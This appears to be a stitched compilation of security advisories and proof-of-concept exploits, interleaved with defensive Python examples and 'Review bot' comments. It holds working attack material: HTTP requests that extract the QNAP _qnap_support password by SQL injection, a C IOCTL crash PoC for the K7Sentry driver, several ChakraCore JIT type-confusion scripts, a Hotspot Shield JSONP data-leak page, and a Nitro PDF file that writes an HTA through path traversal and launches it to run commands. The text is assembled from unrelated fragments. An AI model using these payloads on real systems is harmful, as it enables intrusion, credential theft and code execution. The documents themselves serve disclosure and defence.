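"""Containing a user-supplied file name under a base directory.

Added example (not Horde/Gollem code): an absolute right-hand side makes
posixpath.join drop the base directory; safe_join refuses it instead.
"""
import posixpath
from urllib.parse import unquote


def naive_join(base_dir, user_name):
    """How many applications build the path; an absolute name replaces base_dir."""
    return posixpath.join(base_dir, user_name)


def safe_join(base_dir, user_name):
    """Return base_dir/user_name if it stays strictly inside base_dir, else None."""
    if "\x00" in user_name:
        return None                      # NUL would truncate the name in C-level APIs
    name = unquote(user_name)            # the parameter arrives URL-encoded
    if name.startswith(("/", "\\")) or posixpath.isabs(name):
        return None                      # the exact bypass described above
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, name))
    # Prefix check with a trailing slash so /home/user does not admit /home/userX.
    if candidate.startswith(base.rstrip("/") + "/"):
        return candidate
    return None


def download_decision(base_dir, fn_param):
    """Convenience wrapper returning ('allow', path) or ('deny', None)."""
    path = safe_join(base_dir, fn_param)
    return ("allow", path) if path else ("deny", None)


if __name__ == "__main__":
    base = "/home/user"
    for fn in ["report.txt", "docs/../report.txt", "/test.php", "../other/secret", "%2Ftest.php", "a\x00.txt"]:
        print(repr(fn), "naive ->", naive_join(base, fn), "| safe ->", safe_join(base, fn))
```

The lexical check is only half of the control: the backend that actually opens the file should run as a user confined to the same directory, so that a future bypass of the check still cannot read other users' data.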

## Vulnerability Summary
The following advisory describes a SQL injection found in QTS Helpdesk versions 1.1.12 and earlier.
QNAP helpdesk: “Starting from QTS 4.2.2 you can use the built-in Helpdesk app to directly submit help requests to QNAP from your NAS. To do so, ensure your NAS can reach the Internet, open Helpdesk from the App Center, and create a new Help Request. Helpdesk will automatically collect and attach NAS system information and system logs to your request, and you can provide other information such as the steps necessary to reproduce the error, the error message and screenshots so we can identify the problem faster.”
## Credit
An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
QNAP has released patches to address this vulnerability.
For more information: https://www.qnap.com/en/security-advisory/nas-201709-29
CVE: CVE-2017-13068
## Vulnerability details
In order to trigger the vulnerability, the Remote Support option needs to be enabled.
User controlled input is not sufficiently sanitized: by sending a CLI request to www/App/Controllers/Cli/SupportUtils.php, an attacker can trigger an SQL injection and obtain the password of the _qnap_support user.
The code responsible for checking that the script is invoked from the CLI, and not via the web, is commented out:
```php
// if (strtolower(php_sapi_name()) !== 'cli') {
//     $this->fileLogModel->logError('You can not use this function via web.', __FILE__);
//     die('You can not use this function via web. File: ' . __FILE__);
// }
```
Because of that, registerExternalLog, which calls setExternalLog, is reachable:
```php
public function registerExternalLog($appName, $appLogPath)
{
    $supportUtils = $this->model('SupportUtilsModel');
    if (file_exists($appLogPath) && is_dir($appLogPath)) {
        printf("\r\n[%s] You should assign a log file, not folder.\r\n", colorize($appName, 'ERROR'));
    } else if (file_exists($appLogPath) && !is_dir($appLogPath)) {
        if ($supportUtils->setExternalLog($appName, $appLogPath)) {
            printf("\r\n[%s] Log path %s was registered.\r\n", colorize($appName, 'SUCCESS'), colorize($appLogPath, 'SUCCESS'));
        } else {
            printf("\r\n[%s] Register external log failed.\r\n", colorize($appName, 'ERROR'), colorize($appLogPath, 'ERROR'));
        }
    } else {
        printf("\r\n[%s] Log file not found.\r\n", colorize($appName, 'ERROR'));
    }
}
```
The SQL injection is in $appName, in www/App/Models/SupportUtilsModel.php:
```php
public function setExternalLog($appName, $appLogPath)
{
    $now = time();
    // $appName and $appLogPath are interpolated straight into the statement
    $queryStr = "INSERT INTO external_log (appName, appLogPath, createdTime) VALUES ('$appName', '$appLogPath', '$now')";
    $rowCount = 0;
    try {
        $rowCount = $this->db->queryNoneResult($queryStr);
    } catch (\Exception $e) {
        return false;
    }
    return $rowCount;
}
```
## Proof of Concept
First we need to check whether remote support is enabled on the victim's machine, by sending the following CLI request:
```http
CLI /apps/qdesk/cli/supportutils/upload/a HTTP/1.1
Host: 192.168.1.55:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
```
If it is not enabled, the text “Remote session is not enabled” will be displayed.
Now we can trigger the SQL Injection by sending the following request:
```http
CLI /apps/qdesk/cli/supportutils/applog/reg/bb',(SELECT/*a*/cfgValue/*a*/FROM/*a*/configuration/*a*/WHERE/*a*/cfgKey='tempPw'),'149881968')/*/::/etc/passwd HTTP/1.1
Host: 192.168.1.55:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
```
The registered logs can then be listed with the following request:
```http
CLI /apps/qdesk/cli/supportutils/applog/list HTTP/1.1
Host: 192.168.1.55:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close
```
And the output should look like:
```
| App Name | Log Path                        | Create Time         |
| bb       | BqGgseHn <-- this is password   | 1974-10-02 01:52:48 |
```
Now you can login as:
Login: _qnap_support
Password: Obtained from SQL Injection
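Both this advisory and the PHP Melody one above come down to the same defect: a value from the request (the `$appName` interpolated into the INSERT in `setExternalLog`, and Melody's `aa_pages_per_page` cookie) is pasted into SQL text. The following is an added example, not QNAP's or PHP Melody's code, that reproduces both shapes against an in-memory SQLite database and puts the fix beside each: bound parameters for the string-valued insert, and a strict integer parse for a value that can only ever be a number. The schema, rows, cookie handling and the `constructed-secret` value are constructed for the example; only the `external_log` table and column names follow the PHP shown above, and the `configuration` table is the one the injected subselect above reads from.

```python
"""String-built SQL beside parameterized SQL, for both injection shapes above.

Added example (not QNAP's or PHP Melody's code). Schema and data are constructed.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE external_log (appName TEXT, appLogPath TEXT, createdTime TEXT);
        CREATE TABLE configuration (cfgKey TEXT, cfgValue TEXT);
        INSERT INTO configuration VALUES ('tempPw', 'constructed-secret');
        CREATE TABLE pages (id INTEGER, title TEXT);
        INSERT INTO pages VALUES (1, 'Home'), (2, 'About'), (3, 'Contact');
        """
    )
    return db


# --- string-valued input: the INSERT from SupportUtilsModel.php --------------

def set_external_log_vulnerable(db, app_name, app_log_path, now="0"):
    """Mirrors the PHP: the values become part of the statement text."""
    query = "INSERT INTO external_log (appName, appLogPath, createdTime) VALUES ('%s', '%s', '%s')" % (
        app_name, app_log_path, now)
    db.execute(query)
    return db.execute("SELECT appName, appLogPath FROM external_log").fetchall()


def set_external_log_fixed(db, app_name, app_log_path, now="0"):
    """Same insert with bound parameters: quotes in the input stay data."""
    db.execute(
        "INSERT INTO external_log (appName, appLogPath, createdTime) VALUES (?, ?, ?)",
        (app_name, app_log_path, now),
    )
    return db.execute("SELECT appName, appLogPath FROM external_log").fetchall()


# --- numeric input: a per-page cookie used in a LIMIT clause -----------------

def page_titles_vulnerable(db, cookie_value):
    """The cookie text is pasted into the query, so any SQL expression runs."""
    return [r[0] for r in db.execute("SELECT title FROM pages LIMIT " + cookie_value)]


def parse_per_page(cookie_value, default=10, maximum=100):
    """Strict integer parse; anything but a plain positive integer falls back to the default."""
    if not cookie_value.isdigit():
        return default
    return min(int(cookie_value), maximum)


def page_titles_fixed(db, cookie_value):
    limit = parse_per_page(cookie_value)
    return [r[0] for r in db.execute("SELECT title FROM pages LIMIT ?", (limit,))]


# Same shape as the advisory's payload above: close the string, read another table.
CONSTRUCTED_PAYLOAD = "bb',(SELECT cfgValue FROM configuration WHERE cfgKey='tempPw'),'0')--"


def demo():
    """Return (vulnerable_rows, fixed_rows, vulnerable_titles, fixed_titles)."""
    v = set_external_log_vulnerable(make_db(), CONSTRUCTED_PAYLOAD, "/ignored")
    f = set_external_log_fixed(make_db(), CONSTRUCTED_PAYLOAD, "/ignored")
    db = make_db()
    probe = "(SELECT count(*) FROM configuration)"
    return v, f, page_titles_vulnerable(db, probe), page_titles_fixed(db, probe)


if __name__ == "__main__":
    vulnerable_rows, fixed_rows, vulnerable_titles, fixed_titles = demo()
    print("vulnerable insert stored:", vulnerable_rows)   # secret lands in appLogPath
    print("fixed insert stored     :", fixed_rows)        # payload stored as a literal string
    print("vulnerable LIMIT        :", vulnerable_titles) # row count driven by a subselect
    print("fixed LIMIT             :", fixed_titles)
```

In the vulnerable insert the `configuration` value ends up in `appLogPath`, which is exactly what the `applog/list` output above displays; with bound parameters the same input is stored verbatim and never touches the other table. For the numeric case, validating the type before the query is what removes the time-based probe described for PHP Melody: an expression like a `benchmark()` call is simply not an integer.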

## Vulnerability Summary
The following advisory describes a crash found in K7 Total Security.
## Credit
An independent security researcher, Kyriakos Economou aka @kyREcon, has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
K7 has released patches to address this vulnerability in K7 Total Security version 15.1.0.305.
CVE: CVE-2017-18019
## Vulnerability details
User controlled input to the K7Sentry device is not sufficiently sanitized: the user controlled input can be used to compare an arbitrary memory address with a fixed value, which in turn can be used to read the content of arbitrary memory.
## Crash report
By sending an invalid kernel pointer we can crash the K7 Total Security process as shown here:
```
1: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: f8f8f8f8, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 88c93a63, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
Debugging Details:
------------------
*************************************************************************
*** ***
*** ***
*** Your debugger is not using the correct symbols ***
*** ***
*** In order for this command to work properly, your symbol path ***
*** must point to .pdb files that have full type information. ***
*** ***
*** Certain .pdb files (such as the public OS symbols) do not ***
*** contain the required information. Contact the group that ***
*** provided you with these symbols if you need this command to ***
*** work. ***
*** ***
*** Type referenced: kernel32!pNlsUserInfo ***
*** ***
*************************************************************************
*************************************************************************
*** ***
*** ***
*** Your debugger is not using the correct symbols ***
*** ***
*** In order for this command to work properly, your symbol path ***
*** must point to .pdb files that have full type information. ***
*** ***
*** Certain .pdb files (such as the public OS symbols) do not ***
*** contain the required information. Contact the group that ***
*** provided you with these symbols if you need this command to ***
*** work. ***
*** ***
*** Type referenced: kernel32!pNlsUserInfo ***
*** ***
*************************************************************************
READ_ADDRESS: f8f8f8f8
FAULTING_IP:
K7Sentry+a63
88c93a63 80384b cmp byte ptr [eax],4Bh
MM_INTERNAL_CODE: 2
IMAGE_NAME: K7Sentry.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 54eda273
MODULE_NAME: K7Sentry
FAULTING_MODULE: 88c93000 K7Sentry
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: poc.exey_0x950
CURRENT_IRQL: 2
TRAP_FRAME: 9a15ba14 -- (.trap 0xffffffff9a15ba14)
ErrCode = 00000000
eax=f8f8f8f8 ebx=001ffea0 ecx=00000000 edx=001ffe90 esi=9a15bac0 edi=00000010
eip=88c93a63 esp=9a15ba88 ebp=9a15badc iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010386
K7Sentry+0xa63:
88c93a63 80384b cmp byte ptr [eax],4Bh ds:0023:f8f8f8f8=??
Resetting default scope
LAST_CONTROL_TRANSFER: from 82aebe67 to 82a879d8
STACK_TEXT:
9a15b564 82aebe67 00000003 bf4bd6ad 00000065 nt!RtlpBreakWithStatusInstruction
9a15b5b4 82aec965 00000003 c0603e38 f8f8f8f8 nt!KiBugCheckDebugBreak+0x1c
9a15b978 82a9a9c5 00000050 f8f8f8f8 00000000 nt!KeBugCheck2+0x68b
9a15b9fc 82a4cf98 00000000 f8f8f8f8 00000000 nt!MmAccessFault+0x104
9a15b9fc 88c93a63 00000000 f8f8f8f8 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
9a15badc 82a43129 84a6c1f8 84d9fc30 84d9fc30 K7Sentry+0xa63
9a15baf4 82c3b7af 00000000 84d9fc30 84d9fca0 nt!IofCallDriver+0x63
9a15bb14 82c3eafe 84a6c1f8 84cdcd80 00000000 nt!IopSynchronousServiceTail+0x1f8
9a15bbd0 82c85ac2 00000028 84d9fc30 00000000 nt!IopXxxControlFile+0x810
9a15bc04 82a49db6 00000028 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
9a15bc04 76f16c74 00000028 00000000 00000000 nt!KiSystemServicePostCall
001ffdc8 76f1542c 7504ab4d 00000028 00000000 ntdll!KiFastSystemCallRet
001ffdcc 7504ab4d 00000028 00000000 00000000 ntdll!NtDeviceIoControlFile+0xc
001ffe2c 767fbbc5 00000028 9500286b 001ffe90 KERNELBASE!DeviceIoControl+0xf6
001ffe58 00f51e42 00000028 9500286b 001ffe90 kernel32!DeviceIoControlImplementation+0x80
001ffec4 00f57500 00000001 002a31b0 002a32c0 poc!wmain+0xe2 [e:\k7_2016\k7sentry_0x9500286b_win7_poc\k7sentry_0x9500286b\main.cpp @ 31]
001fff0c 767fef8c 7ffd7000 001fff58 76f3367a poc!__tmainCRTStartup+0xfe [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 255]
001fff18 76f3367a 7ffd7000 76ec24f9 00000000 kernel32!BaseThreadInitThunk+0xe
001fff58 76f3364d 00f5757d 7ffd7000 00000000 ntdll!__RtlUserThreadStart+0x70
001fff70 00000000 00f5757d 7ffd7000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: kb
FOLLOWUP_IP:
K7Sentry+a63
88c93a63 80384b cmp byte ptr [eax],4Bh
```
## Proof of Concept
The PoC has been tested on Windows 7 x86
```
#include <Windows.h>
#include <iostream>
using namespace std;
int wmain()
{
HANDLE hDevice = CreateFileW(L"\\\\.\\K7Sentry", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
cout << endl << "Failed accessing K7Sentry Device Driver. Error: " << dec << GetLastError() << endl;
cin.get();
return 0;
}
BYTE dummyBuf[0x20];
memset(dummyBuf, 0, sizeof(dummyBuf));
*(ULONG_PTR*)dummyBuf = 0xF8F8F8F8; //INVALID KERNEL POINTER TO TRIGGER PAGE FAULT POC.
cout << endl << "Sending malformed IOCTL..." << endl;
DWORD bytesReturned = 0;
DeviceIoControl(hDevice, 0x9500286B, dummyBuf, sizeof(dummyBuf), dummyBuf, sizeof(dummyBuf), &bytesReturned, NULL);
cin.get();
return 0;
}
```
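Review bot: the Vulnerability details paragraph (L2837) never names the missing check. The crash shows `cmp byte ptr [eax],4Bh` at K7Sentry+0xa63 with eax=f8f8f8f8 (L2906, L2910), which is the value the PoC writes into the first DWORD of the IOCTL 0x9500286B input buffer (L2957, L2960); so a pointer read out of the user-supplied buffer is dereferenced without ProbeForRead/try-except style validation, and the paragraph should state that plainly, since it is also what the fixed 15.1.0.305 build must be doing differently. Minor: "an Crash" (L2830) should read "a crash", and the duplicated "not using the correct symbols" banners (L2859-L2890) say nothing about the bug and can be trimmed from the crash report. The PoC also discards the return value of `DeviceIoControl` (L2960); printing it and `GetLastError()` on failure would make a non-crashing run diagnosable.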


@ -0,0 +1,40 @@
It seems this is the patch for the bug.
https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a
The following two cases will bypass the fix.
1:
function opt() {
let obj = new Number(2.3023e-320);
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();
2:
function opt() {
let obj = '2.3023e-320';
for (let i = 0; i < 1; i++) {
obj.x = 1;
obj = +obj;
obj.x = 1;
}
}
function main() {
for (let i = 0; i < 100; i++) {
opt();
}
}
main();
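Review bot: the record explains nothing beyond "the following two cases will bypass the fix" (L2971). Unlike the sibling Chakra entries there is no comment on what the referenced commit changed, why unary plus on a `Number` object (case 1, L2974) or on a numeric string (case 2, L2989) followed by a property store on the result escapes that check, or what the expected outcome is when the script is run; a short header comment would make the entry reproducible and reviewable.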


@ -0,0 +1,91 @@
/*
Let's consider the following example code.
function opt() {
let arr = [];
return arr['x'];
}
// Optimize the "opt" function.
for (let i = 0; i < 100; i++) {
opt();
}
Array.prototype.__defineGetter__('x', function () {
});
opt();
Once the "opt" function has been optimized, the getter function for "x" can't be invoked from the JITed code, instead it bailouts and invokes the getter. This is due to the DisableImplicitCallFlag flag.
Here's the function handling that logic.
template <class Fn>
inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
{
// For now, we will not allow Function that is marked as HasNoSideEffect to be called, and we will just bailout.
// These function may still throw exceptions, so we will need to add checks with RecordImplicitException
// so that we don't throw exception when disableImplicitCall is set before we allow these function to be called
// as an optimization. (These functions are valueOf and toString calls for built-in non primitive types)
Js::FunctionInfo::Attributes attributes = Js::FunctionInfo::GetAttributes(function);
// we can hoist out const method if we know the function doesn't have side effect,
// and the value can be hoisted.
if (this->HasNoSideEffect(function, attributes))
{
// Has no side effect means the function does not change global value or
// will check for implicit call flags
return implicitCall();
}
// Don't call the implicit call if disable implicit call
if (IsDisableImplicitCall())
{
AddImplicitCallFlags(flags);
// Return "undefined" just so we have a valid var, in case subsequent instructions are executed
// before we bail out.
return function->GetScriptContext()->GetLibrary()->GetUndefined();
}
if ((attributes & Js::FunctionInfo::HasNoSideEffect) != 0)
{
// Has no side effect means the function does not change global value or
// will check for implicit call flags
return implicitCall();
}
// Save and restore implicit flags around the implicit call
Js::ImplicitCallFlags saveImplicitCallFlags = this->GetImplicitCallFlags();
Js::Var result = implicitCall();
this->SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
return result;
}
As you can see above, it checks if the DisableImplicitCallFlag flag is set using IsDisableImplicitCall, if it is, just returns undefined and bailouts.
The reason that the flag was set in the example code was because of the "arr" variable was allocated in the stack. It was preventing the object from leaking through implicit calls.
However, if the function has no side effect, the function gets called regardless of the flag. One such function that is marked as HasNoSideEffect, but we can abuse is the Object.prototype.valueOf method. This method returns "this" itself. So if we use this method as the getter, it will return the array object allocated in the stack.
PoC:
*/
function opt() {
let arr = [];
return arr['x'];
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 0x10000; i++) {
opt();
}
Array.prototype.__defineGetter__('x', Object.prototype.valueOf);
print(opt());
}
main();
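Review bot: `arr` declared in `main()` on L3067 is never used; drop it or say why it is there. `print(opt())` on L3072 assumes a JavaScript shell such as ChakraCore's `ch` rather than a browser, and that is worth stating, because the point of the record is that `opt()` returns the stack-allocated array leaked through `Object.prototype.valueOf` (L3059, L3071) and a reader needs the right host to observe it.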


@ -0,0 +1,49 @@
/*
Here's a snippet of ExecuteImplicitCall which is responsible for updating the ImplicitCallFlags flag.
template <class Fn>
inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
{
...
Js::ImplicitCallFlags saveImplicitCallFlags = this->GetImplicitCallFlags();
Js::Var result = implicitCall();
this->SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
return result;
}
It updates the flag after the implicit call. So if an exception is thrown during the implicit call, the flag will remain not updated. And the execution will be broken until the exeception gets handled. Namely, if we can ignore the exception in any way, we can bypass the ImplicitCallFlags checks.
At this point, "typeof" comes to rescue. The weird handler for "typeof" catchs execptions and clears them. For example, in the following code, the exeception thrown from toString will be ignored.
let o = {
toString: () => {
throw 1;
}
};
typeof(this[o]);
So, we can bypass the ImplicitCallFlags checks by throwing an exception and clearing it using "typeof".
*/
function opt(arr, index) {
arr[0] = 1.1;
typeof(arr[index]);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 0x10000; i++) {
opt(arr, {});
}
opt(arr, {toString: () => {
arr[0] = {};
throw 1;
}});
print(arr[0]);
}
main();
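Review bot: spelling in the explanatory comment, "catchs", "execptions", "exeception" (L3090, L3091). The sentence "the execution will be broken until the exeception gets handled" (L3090) would be clearer as: the flag update on L3087 is skipped whenever `implicitCall()` throws, which is exactly what the `toString` on L3110-L3113 does after it has written an object into `arr[0]`; spelling that out ties the snippet to the PoC.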


@ -0,0 +1,26 @@
/*
If a native array is used as a prototype, it is converted to a Var array by the Js::JavascriptNativeFloatArray::SetIsPrototype method.
In the JIT compiler, it uses InitProto instructions to set object literals' prototype. But when optimizing those instructions, it doesn't reset the previous array validity even it can change the type of arrays. As a result, it can lead to type confusion.
Note: Expressions like "obj.__proto__" don't use InitProto instructions.
*/
function opt(arr, proto) {
arr[0] = 1.1;
let tmp = {__proto__: proto};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 10000; i++) {
opt(arr, {});
}
opt(arr, arr);
print(arr);
}
main();
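Review bot: `tmp` on L3128 looks like dead code but is the whole mechanism; the object literal with a `__proto__` key is what emits the InitProto instruction the comment describes (L3123). Add a one-line comment saying so, otherwise the assignment is liable to be "cleaned up". Also "even it can change the type of arrays" (L3123) should read "even though it can change the type of arrays".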


@ -0,0 +1,48 @@
/*
This is simillar to the previous issue 1457. But this time, we use Array.prototype.reverse.
Array.prototype.reverse can be inlined and may invoke EnsureNonNativeArray to convert the prototype of "this" to a Var array.
Call flow: JavascriptArray::EntryReverse -> FillFromPrototypes -> ForEachOwnMissingArrayIndexOfObject -> EnsureNonNativeArray
To make that happen, the prototype must be a native array. But this usually can't be fulfilled, since once it's set as a prototype, it gets converted to a Var array. To bypass this, we can use Array.prototype.sort.
Here's a snippet of JavascriptArray::EntrySort.
arr = JavascriptNativeFloatArray::ConvertToVarArray((JavascriptNativeFloatArray*)arr);
JS_REENTRANT(jsReentLock, arr->Sort(compFn));
arr = arr->ConvertToNativeArrayInPlace<JavascriptNativeFloatArray, double>(arr);
If "this" is a native array, the "sort" method first converts it to a Var array, sorts it, and then converts it back to the original type. So by setting it as a prototype in the compare function, we can make an object that its prototype is a native array.
PoC:
*/
function opt(arr, arr2) {
arr2[0];
arr[0] = 1.1;
arr2.reverse();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
arr.__proto__ = null; // avoid inline caching
delete arr[1]; // avoid doArrayMissingValueCheckHoist
let arr2 = [, {}];
arr2.__proto__ = {};
arr2.reverse = Array.prototype.reverse;
for (let i = 0; i < 10000; i++) {
opt(arr, arr2);
}
Array.prototype.sort.call(arr, () => {
arr2.__proto__.__proto__ = arr;
});
opt(arr, arr2);
print(arr[0]);
}
main();
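Review bot: "previous issue 1457" (L3145) is an opaque tracker reference inside this record; name the sibling entry it builds on so the two files can be read together. "simillar" should read "similar" (L3145). The inline comments on L3164-L3165 ("avoid inline caching", "avoid doArrayMissingValueCheckHoist") are exactly the level of detail the `sort` trick on L3172-L3174 also needs: a comment that the compare callback runs while `arr` is temporarily a Var array (L3150-L3153) and installs it as a prototype before `ConvertToNativeArrayInPlace` turns it back.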


@ -0,0 +1,32 @@
/*
This is similar to the previous issues 1457, 1459 (MSRC 42551, MSRC 42552).
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.
PoC:
*/
function inlinee() {
}
function opt(arr) {
arr[0] = 1.1;
new inlinee();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
inlinee.prototype = {};
opt(arr);
}
inlinee.prototype = arr;
opt(arr);
print(arr);
}
main();
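Review bot: "consturctor" should read "constructor" (L3185). The warm-up loop reassigns `inlinee.prototype = {}` on every iteration (L3198) before the final `inlinee.prototype = arr` (L3201); a short comment on why the prototype has to be churned during warm-up rather than set once would help, as the other records do for their warm-up quirks.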


@ -0,0 +1,23 @@
/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.
PoC:
*/
function opt(arr) {
arr[0] = 1.1;
this[0] = {};
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt.call({}, arr);
}
opt.call(arr, arr);
print(arr);
}
main();


@ -0,0 +1,39 @@
## Vulnerability Summary
The following advisory describes a information disclosure found in Hotspot Shield.
Hotspot Shield “provides secure and private access to a free and open internet. Enabling access to social networks, sports, audio and video streaming, news, dating, gaming wherever you are.”
## Credit
An independent security researcher, Paulos Yibelo, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
“Thank you very much again for contacting us. The info is being reviewed and if there are any questions/comments, well contact you by re-opening this ticket”
CVE: CVE-2018-6460
## Vulnerability details
The HotspotShiled product runs webserver with a static IP 127.0.0.1 and port 895.
The web server using JSONP and hosts sensitive information, including, configuration.
User controlled input is not sufficiently filterd, an unauthenticated attacker can send a POST request to /status.js with parameter func=$_APPLOG.Rfunc and extract sensitive information about the machine, including wheater the user is connected to VPN, to which VPN he/she is connected to what their real IP address.
## Proof of Concept
```
<head>
<script>
var $_APPLOG = function() { return 1; }
$_APPLOG.Rfunc = function(leak){
alert(JSON.stringify(leak));
}
</script>
</head>
<script>
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.id = 'jsonp';
script.src = 'http://127.0.0.1:895/status.js?func=$_APPLOG.Rfunc&tm='+(new Date().getTime());
head.appendChild(script);
</script>
```
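Review bot: the details paragraph says the attacker sends a POST request to /status.js (L3243), but the PoC loads that URL through a `<script src>` element (L3258), which issues a GET; reconcile the two, since it determines what a proxy or host-based rule should look for. Spelling: "a information" (L3233), "HotspotShiled" (L3241), "filterd" and "wheater" (L3243), and "well contact" (L3238) is missing its apostrophe. The clause "to which VPN he/she is connected to what their real IP address" (L3243) is missing an "and".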


@ -0,0 +1,294 @@
## Vulnerabilities Summary
The following advisory describes three vulnerabilities found in Nitro / Nitro Pro PDF.
Nitro Pro is the PDF reader and editor that does everything you will ever need to do with PDF files. The powerful but snappy editor lets you change PDF documents with ease, and comes with a built-in OCR engine that can transform scanned documents into editable files. Fill up forms, annotate and sign them as part of your workflow, and easily merge multiple documents or delete selected pages as necessary.
If you use a large display or multiple monitors, NitroPDF also offers the ability to display PDF documents side-by-side so that you can pore through multiple documents. Of course, you could use AquaSnap to do that.
The vulnerabilities found in Nitro PDF are:
Doc.saveAs Directory Traversal Arbitrary File Write that lead to Command Execution
App.launchURL Command Execution
JPEG2000 npdf.dll Use-After-Free
Forms Parsing NPForms.npp Use-After-Free
File Parsing Count Field npdf.dll Memory Corruption
NewWindow Launch Action NPActions.npp Command
URI Action NPActions.npp Command Execution
This report contain the following vulnerabilities:
Doc.saveAs Directory Traversal Arbitrary File Write that lead to Command Execution
App.launchURL Command Execution
JPEG2000 npdf.dll Use-After-Free
## Credit
Two independent security researchers, Steven Seeley and anonymous, have reported these vulnerabilities to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability. “Number of the reported vulnerabilities have been resolved and confirmed, and will included in our next release of Nitro Pro, 11.05.”
For more details: https://www.gonitro.com/support/downloads#securityUpdates
CVE:
CVE-2017-2796
CVE-2017-7950
## Vulnerabilities Details
Doc.saveAs Directory Traversal Arbitrary File Write that lead to Command Execution
The Doc.saveAs function does not validate either the file extension, the content of the PDF or if the path contains traversals before saving it to disk.
An attacker can leverage this to write a malicious file to the operating system in any path. This alone can be used to achieve remote code execution by writing into the users startup folder.
App.launchURL Command Execution
The App.launchURL function allows an attacker to execute commands with the privileges of the currently running user. However, a security alert or warning is typically triggered when doing so.
This can be bypassed if a $ sign is used within the path. Note that if an attacker does this, they will execute the file from the current directory, which may not be ideal for exploitation.
Also note, that the App.launchURL function does not filter for space characters such as carriage return and line feeds. This can allow an attacker to spoof the file /url being launched.
## Doc.saveAs and App.launchURL Remote Code Execution Proof of Concept
```
%PDF-1.7
4 0 obj
<<
/Length 0
>>
stream
<script>
// enter your shellcode here
WshShell = new ActiveXObject("WScript.Shell");
WshShell.Run("c:/windows/system32/calc.exe", 1, false);
</script>
endstream endobj
5 0 obj
<<
/Type /Page
/Parent 2 0 R
/Contents 4 0 R
>>
endobj
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
/OpenAction [ 5 0 R /Fit ]
/Names <<
/JavaScript <<
/Names [
(EmbeddedJS)
<<
/S /JavaScript
/JS (
this.saveAs('../../../../../../../../../../../../../../../../Windows/Temp/si.hta');
app.launchURL('c$:/../../../../../../../../../../../../../../../../Windows/Temp/si.hta');
)
>>
]
>>
>>
>>
endobj
2 0 obj
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
endobj
